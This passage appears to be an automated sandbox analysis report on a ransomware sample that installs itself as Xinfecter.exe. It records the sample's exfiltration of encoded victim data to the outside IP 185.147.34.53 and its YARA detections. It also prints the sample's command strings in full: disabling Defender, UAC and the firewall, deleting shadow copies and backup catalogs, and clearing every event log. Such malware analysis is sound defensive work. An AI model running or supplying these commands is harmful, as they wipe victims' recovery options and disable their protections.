s396Rwyg99gxFMspcd8uXb1Ej9JCya6lA60jvhIXwvhTKUhLQYVSgy4UXzgKCzYylQ94CK91iuRzCTH1EGU6r60aSqBgmTPr+IEV6/c8U6nbg8Uv0CgYEA8W9HHP/6dkC1riy8YWIhdm+5ODj5rLNcVU0xBMNcfymS0+m55knP8GHuTWHNLVdX9K9LQ29FHj3r5sXNzpWi7z1HEjfsOPfV7c3PsUKGy4DsC5gxGsd+fSxEh6KAYe5YyhzzXTJ1FGtGQcb8C8CvcXxyfpLHQ0Y+8A99cBbEqbUCgYEAz3tzs7YMH3mXV2Riv4TQltr8PaTTn41dibO3IcburPD8hf7mnIMVEJrbWk0K9HT5bHUhw/7QLdQrRuBgD8BcEVBuZNvvvL00gKY9h6nXP2PZEf5vZmFxvUT57Thccztob5wRVv6zPHkGm4ZAeNwMO4TbYlPH4zpUNuAHWue2JqUCgYAcZ3HHLSyGYfdBquj8ZeXRssp/FcMFQkcZGCPicVYtE/Mn/WEqJs0rVtC9z0VQoN0r2GM1HCY/ywyxvOsJPsff6RdrjhvKd4KUcpDnrXlFHjnjPxTV+Vos2AgP9QALhXPbiu90YEoCZvk06jvFJbpJliuWa5742xZ2mGkcPun12QKBgQCq3iMMd82/kU91JX5/mo2paQv2h71WOC7p30uFOmo0EcDm0esXewJJ6PDg9Ccjq6A7M0j7wsmPJzKy1uWynmnwJB6tadR9UIWXH333QJMlJQ0d4Jf59eUydQoOpuK5P/unNTt00cDIY6sWqsuu01VeMS0jzIZ+5L3S1pylN0q2aQKBgQCYKsoAhyE9+439J6UCrYQ70hhCqko+reMPDsbMjXV0lOYCPTw0OX26h3uSj97pAAMAtPmarYf1x3MgNFi0OKYCKMKD10TQ1ZQO3eXLXmWARKYtu/cRWgVG91plhCdCwtyxhzaEXn1URPjvInuphn4h1q3y8tdjj99naN0D7r4UKQ==&77H75*7.999268(2)2,d5unlockingrdp3@gmail.com HTTP/1.1Host: 185.147.34.53Connection: close
        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
        Source: Joe Sandbox ViewIP Address: 185.147.34.53 185.147.34.53
        Source: Joe Sandbox ViewASN Name: HOSTSLIM-GLOBAL-NETWORKNL HOSTSLIM-GLOBAL-NETWORKNL
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownTCP traffic detected without corresponding DNS query: 185.147.34.53
        Source: unknownTCP traffic detected without corresponding DNS query: 185.147.34.53
        Source: unknownTCP traffic detected without corresponding DNS query: 185.147.34.53
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008B8D10 std::locale::_Init,WSAStartup,socket,gethostbyname,htons,connect,send,recv,recv,closesocket,WSACleanup,1_2_008B8D10
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/*User-Agent: YourUserAgentHost: api.ipify.org
        Source: global trafficHTTP traffic detected: GET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:39:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~L8aI4Dmwj4IAGsj1kBSGMcYydlQMVc9w0JoZmoaumhEXx06wC+fRSdEFpm5V6oWMp3tLPriQk05mszsyPy92zYenvnwEOpE5Cu5ynerWWnZRuY9JoBD7XQlmkj3dwcDaoB47TXLfKI9BVaKCyncaMp6B+5hpDTp/Voi1+nc81kqofSdhx+EmMJCDlQwjNLFyzVc6cN65bHpqoaELtCxFI079gXBCFsVljPKykMPlOE3C25nMWauaceeMu3QU7npybPaQYsB6QbzSUgY7T7z6JERI/gqMedNN4IYFtVQO/k2DgXYnXNHAnDRK9Z9LGqeYeHaeHuHllFjnHKE1DgIm6bZBGywl5BQ42uizHVtOKzNx+crjNEfSqeRAZ/AoyLX8dp9ntkCgWu/DNPGqfoTreXwIvnXcjuDzUrmajt76h+VO6YItix4AnTzd01lB2qCSH03T5gm67zlpLj0FhRUiTvrqP2NqDoiew5Ae6uW1wsBplqTyjoqe//Fub/uYviJB+iMJ7x236hVo/mhbRTTaxhRSNAyFzkbSOkxQDaFjT/Hs+La5BMaXZ714KdOWoxkMtmO7S03fKLsJKCsMVLWcGlGGGsmb9vjTXoD+pAgERAoIBABQkrJjcwevdSBz391Xp85+qa5GWs9LwVnB3O/sRSKBwDEtx7ssEXiFi5rYJBymqawBH99Z8EF0P+xZ+/TjFKhqrUeqajT7zLOzzdue2Mvp7DWTigZTYs7Z1QqbUM5I+FdGEmId4/Eu+u8tbJMm8CIn+jHUrSRFyEDHG67RBbFUzbWR60rQ5hQWwWO5nsOF/MoSImnAlisIiGYXZ3oCbEikPfqWPirXSM/nlmis396Rwyg99gxFMspcd8uXb1Ej9JCya6lA60jvhIXwvhTKUhLQYVSgy4UXzgKCzYylQ94CK91iuRzCTH1EGU6r60aSqBgmTPr+IEV6/c8U6nbg8Uv0CgYEA8W9HHP/6dkC1riy8YWIhdm+5ODj5rLNcVU0xBMNcfymS0+m55knP8GHuTWHNLVdX9K9LQ29FHj3r5sXNzpWi7z1HEjfsOPfV7c3PsUKGy4DsC5gxGsd+fSxEh6KAYe5YyhzzXTJ1FGtGQcb8C8CvcXxyfpLHQ0Y+8A99cBbEqbUCgYEAz3tzs7YMH3mXV2Riv4TQltr8PaTTn41dibO3IcburPD8hf7mnIMVEJrbWk0K9HT5bHUhw/7QLdQrRuBgD8BcEVBuZNvvvL00gKY9h6nXP2PZEf5vZmFxvUT57Thccztob5wRVv6zPHkGm4ZAeNwMO4TbYlPH4zpUNuAHWue2JqUCgYAcZ3HHLSyGYfdBquj8ZeXRssp/FcMFQkcZGCPicVYtE/Mn/WEqJs0rVtC9z0VQoN0r2GM1HCY/ywyxvOsJPsff6RdrjhvKd4KUcpDnrXlFHjnjPxTV+Vos2AgP9QALhXPbiu90YEoCZvk06jvFJbpJliuWa5742xZ2mGkcPun12QKBgQCq3iMMd82/kU91JX5/mo2paQv2h71WOC7p30uFOmo0EcDm0esXewJJ6PDg9Ccjq6A7M0j7wsmPJzKy1uWynmnwJB6tadR9UIWXH333QJMlJQ0d4Jf59eUydQoOpuK5P/unNTt00cDIY6sWqsuu01VeMS0jzIZ+5L3S1pylN0q2aQKBgQCYKsoAhyE9+439J6UCrYQ70hhCqko+reMPDsbMjXV0lOYCPTw0OX26h3uSj97pAAMAtPmarYf1x3MgNFi0OKYCKMKD10TQ1ZQO3eXLXmWARKYtu/cRWgVG91plhCdCwtyxhzaEXn1URPjvInuphn4h1q3y8tdjj99naN0D7r4UKQ==&77H75*7.999268(2)2,d5unlockingrdp3@gmail.com HTTP/1.1Host: 185.147.34.53Connection: close
        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
        Source: 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
        Source: 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 8AbMCL2dxM.exe, 00000001.00000002.3512126954.0000000000AE9000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
        Source: 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/ows
        Source: 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgd
        Source: 8AbMCL2dxM.exe, Xinfecter.exe.1.drString found in binary or memory: https://www.coinbase.com/how-to-buy/bitcoin
        Source: 8AbMCL2dxM.exe, Xinfecter.exe.1.drString found in binary or memory: https://www.kraken.com/learn/buy-bitcoin-btc

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Yara detected RCRU64 Ransomware
        Source: Yara matchFile source: Process Memory Space: 8AbMCL2dxM.exe PID: 7152, type: MEMORYSTR
        Yara detected TrojanRansom
        Source: Yara matchFile source: Process Memory Space: 8AbMCL2dxM.exe PID: 7152, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: Xinfecter.exe PID: 3164, type: MEMORYSTR
        Contains functionality to clear event logs
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"1_2_008D4819
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"1_2_008DC940
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"1_2_008DD85F
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"42_2_00234819
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"42_2_0023C940
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"42_2_0023D85F
        Deletes shadow drive data (may be related to ransomware)
        Source: 8AbMCL2dxM.exeBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic
        Source: 8AbMCL2dxM.exe, 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
        Source: 8AbMCL2dxM.exe, 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
        Source: 8AbMCL2dxM.exe, 00000001.00000003.2271855364.0000000000D1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
        Source: 8AbMCL2dxM.exe, 00000001.00000003.2271855364.0000000000D1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
        Source: 8AbMCL2dxM.exe, 00000001.00000000.2246238514.0000000000993000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
        Source: 8AbMCL2dxM.exe, 00000001.00000000.2246238514.0000000000993000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
        Source: Xinfecter.exeBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic
        Source: Xinfecter.exe, 0000002A.00000000.2361058622.00000000002F3000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
        Source: Xinfecter.exe, 0000002A.00000000.2361058622.00000000002F3000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
        Source: Xinfecter.exe, 0000002A.00000002.2362815131.00000000002F3000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
        Source: Xinfecter.exe, 0000002A.00000002.2362815131.00000000002F3000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
        Source: 8AbMCL2dxM.exeBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
        Source: 8AbMCL2dxM.exeBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
        Source: S-6748.bat.1.drBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
        Source: Xinfecter.exe.1.drBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
        Source: Xinfecter.exe.1.drBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet

        System Summary

        barindex
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Writes or reads registry keys via WMI
        Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0093D060: CreateFileW,DeviceIoControl,CloseHandle,1_2_0093D060
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile created: C:\Windows\SysMain.sysJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile created: C:\Windows\SysMain.sysJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008D48191_2_008D4819
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008DC9401_2_008DC940
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00916AEB1_2_00916AEB
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008C4E201_2_008C4E20
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008B93001_2_008B9300
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0095C0271_2_0095C027
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0097A0791_2_0097A079
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009240601_2_00924060
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0091E1901_2_0091E190
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0092A1081_2_0092A108
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008C62801_2_008C6280
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008CA2AA1_2_008CA2AA
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009442F51_2_009442F5
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008CE2E01_2_008CE2E0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0097237D1_2_0097237D
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009164841_2_00916484
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0096A4E01_2_0096A4E0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009244701_2_00924470
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008F46801_2_008F4680
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009166A81_2_009166A8
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008C06F81_2_008C06F8
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009187A01_2_009187A0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008F08801_2_008F0880
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009189A01_2_009189A0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009249101_2_00924910
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008FAAC01_2_008FAAC0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008B8AE01_2_008B8AE0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00944AE41_2_00944AE4
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008C8A301_2_008C8A30
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00902BC01_2_00902BC0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008C8B701_2_008C8B70
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00918C401_2_00918C40
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0091CFC51_2_0091CFC5
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00916F461_2_00916F46
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009250D01_2_009250D0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008CF0201_2_008CF020
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0096F11B1_2_0096F11B
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008C72E71_2_008C72E7
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009472681_2_00947268
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009813041_2_00981304
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008B53301_2_008B5330
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009253701_2_00925370
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008F96901_2_008F9690
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008F16001_2_008F1600
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0094965A1_2_0094965A
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009157B41_2_009157B4
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009157A71_2_009157A7
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009597F01_2_009597F0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0091D73F1_2_0091D73F
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008CB7401_2_008CB740
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00901AA01_2_00901AA0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008BBAB01_2_008BBAB0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0091DAC61_2_0091DAC6
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00959A621_2_00959A62
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008BDB001_2_008BDB00
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008F3B001_2_008F3B00
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00915B3B1_2_00915B3B
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0096BC8B1_2_0096BC8B
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008F5C001_2_008F5C00
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00963DB31_2_00963DB3
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0093FDF01_2_0093FDF0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0091DD571_2_0091DD57
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008CFD501_2_008CFD50
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008F1E301_2_008F1E30
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00963FE21_2_00963FE2
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0023481942_2_00234819
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0023C94042_2_0023C940
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00224E2042_2_00224E20
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002BC02742_2_002BC027
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0028406042_2_00284060
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002DA07942_2_002DA079
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0028A10842_2_0028A108
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0027E19042_2_0027E190
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0022A2AA42_2_0022A2AA
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0022628042_2_00226280
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0022E2E042_2_0022E2E0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002A42F542_2_002A42F5
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002D237D42_2_002D237D
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0028447042_2_00284470
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0027648442_2_00276484
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002CA4E042_2_002CA4E0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002766A842_2_002766A8
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0025468042_2_00254680
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002206F842_2_002206F8
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002787A042_2_002787A0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0025088042_2_00250880
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0028491042_2_00284910
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002789A042_2_002789A0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00228A3042_2_00228A30
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00218AE042_2_00218AE0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00276AEB42_2_00276AEB
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002A4AE442_2_002A4AE4
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0025AAC042_2_0025AAC0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00228B7042_2_00228B70
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00262BC042_2_00262BC0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00278C4042_2_00278C40
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00276F4642_2_00276F46
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0027CFC542_2_0027CFC5
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0022F02042_2_0022F020
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002850D042_2_002850D0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002CF11B42_2_002CF11B
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002271D042_2_002271D0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002A726842_2_002A7268
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0021533042_2_00215330
